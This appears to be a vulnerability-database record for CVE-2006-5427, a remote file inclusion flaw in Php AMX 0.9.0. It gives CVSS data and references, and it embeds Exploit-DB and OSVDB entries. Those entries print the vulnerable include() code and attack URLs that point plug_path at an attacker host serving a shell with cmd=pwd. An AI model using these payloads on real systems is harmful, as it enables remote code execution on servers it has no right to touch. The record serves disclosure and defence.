ID CVE-2006-5427
Type cve
Reporter cve@mitre.org
Modified 2017-10-19T01:29:00
Description
PHP remote file inclusion vulnerability in plugins/main.php in Php AMX 0.9.0, when register_globals is enabled or magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plug_path parameter.
{"id": "CVE-2006-5427", "bulletinFamily": "NVD", "title": "CVE-2006-5427", "description": "PHP remote file inclusion vulnerability in plugins/main.php in Php AMX 0.9.0, when register_globals is enabled or magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plug_path parameter.", "published": "2006-10-20T17:07:00", "modified": "2017-10-19T01:29:00", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5427", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/bid/20601", "https://exchange.xforce.ibmcloud.com/vulnerabilities/29649", "http://secunia.com/advisories/22455", "https://www.exploit-db.com/exploits/2591", "http://www.vupen.com/english/advisories/2006/4088"], "cvelist": ["CVE-2006-5427"], "type": "cve", "lastseen": "2019-05-29T18:08:34", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "0a70a58351b714e76207323ef3271a5f"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "0546e5e3884f232ebfa23f412c08227b"}, {"key": "cpe23", "hash": "3bf8df9f3f174ee6502b2c420fdee0f1"}, {"key": "cvelist", "hash": "f0dbc438796d1f27edcbb91323a1d994"}, {"key": "cvss", "hash": "1e7c2c7ebabdae1d396543cea1053bd4"}, {"key": "cvss2", "hash": "c3c5fe26c369fd6cac11b27616fee883"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "5ec603e58bc0fb82a53c93edebad96c0"}, {"key": "href", "hash": "24450ca6e3547f08322ee094bd63b03b"}, {"key": "modified", "hash": "444d43e9817288cd3cd8e6c9a31c8aed"}, {"key": "published", "hash": "7f5ef2bee80970e79b78ca2624285e2c"}, {"key": "references", "hash": "39fcbd8c1652df7fe8eca3b9cef61bcf"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "7bac46509c89dfd3dc1a8b811a66e2fb"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f76dc06ba34f4ad341ff2b54e76672e5725e9b5ec6e073f2444738212dd99454", "viewCount": 0, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2019-05-29T18:08:34"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:2591"]}, {"type": "osvdb", "idList": ["OSVDB:29758"]}], "modified": "2019-05-29T18:08:34"}, "vulnersScore": 6.6}, "objectVersion": "1.3", "cpe": ["cpe:/a:php_amx:php_amx:0.9.0"], "affectedSoftware": [{"name": "php_amx php_amx", "operator": "eq", "version": "0.9.0"}], "cvss2": {"cvssV2": {"accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 4.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:php_amx:php_amx:0.9.0:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}
{"exploitdb": [{"lastseen": "2016-01-31T16:37:04", "bulletinFamily": "exploit", "description": "Php AMX 0.90 (plugins/main.php) Remote File Include Vulnerability. CVE-2006-5427. Webapps exploit for php platform", "modified": "2006-10-18T00:00:00", "published": "2006-10-18T00:00:00", "id": "EDB-ID:2591", "href": "https://www.exploit-db.com/exploits/2591/", "type": "exploitdb", "title": "Php AMX 0.90 plugins/main.php Remote File Include Vulnerability", "sourceData": "## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##\n# #\n# [ phpamx 0.90 ] #\n# \n# Class: Remote|Local File Include Vulnerability #\n# Patch: Unavailable #\n# Published 2006/10/18 #\n# Remote: Yes \n# Local: No \t\t\t\t\t\t#\n# Type: High #\n# Site: http://sourceforge.net/projects/phpamx/ #\n# Author: MP\n# Contact: mp01010@yahoo.com \t\t\t\t#\n# \t\t\t\t\t\t\t#\n#################################################################\n\nVuln Code\n (php/plugins/main.php):\n<?php\ninclude($plug_path.\"!playtime_top15.php\");\ninclude($plug_path.\"!mapcycle_list.php\");\n//nothing here\n?>\n\n#Vuln 1.0 -> require register_globals = On\nhttp://victim.com/phpamx-0.9.0/php/plugins/main.php?plug_path=http://attacker.com/\n\n\n#Vuln 2.0 -> require magic_quotes_gpc = Off\nhttp://victim.com/phpamx-0.9.0/php/plugins/main.php?plug_path=http://attacker.com/shell.php?cmd=pwd%00\n\n# milw0rm.com [2006-10-18]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2591/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "## Manual Testing Notes\n# require register_globals = On\nhttp://[target]/phpamx-0.9.0/php/plugins/main.php?plug_path=http://[attacker]/\n\n# require magic_quotes_gpc = Off\nhttp://[target]/phpamx-0.9.0/php/plugins/main.php?plug_path=http://[attacker]/shell.php?cmd=pwd%00\n## References:\nVendor URL: http://sourceforge.net/projects/phpamx/\n[Secunia Advisory ID:22455](https://secuniaresearch.flexerasoftware.com/advisories/22455/)\nISS X-Force ID: 29649\nGeneric Exploit URL: http://milw0rm.com/exploits/2591\nFrSIRT Advisory: ADV-2006-4088\n[CVE-2006-5427](https://vulners.com/cve/CVE-2006-5427)\nBugtraq ID: 20601\n", "modified": "2006-10-18T12:18:46", "published": "2006-10-18T12:18:46", "href": "https://vulners.com/osvdb/OSVDB:29758", "id": "OSVDB:29758", "title": "Php AMX plugins/main.php plug_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}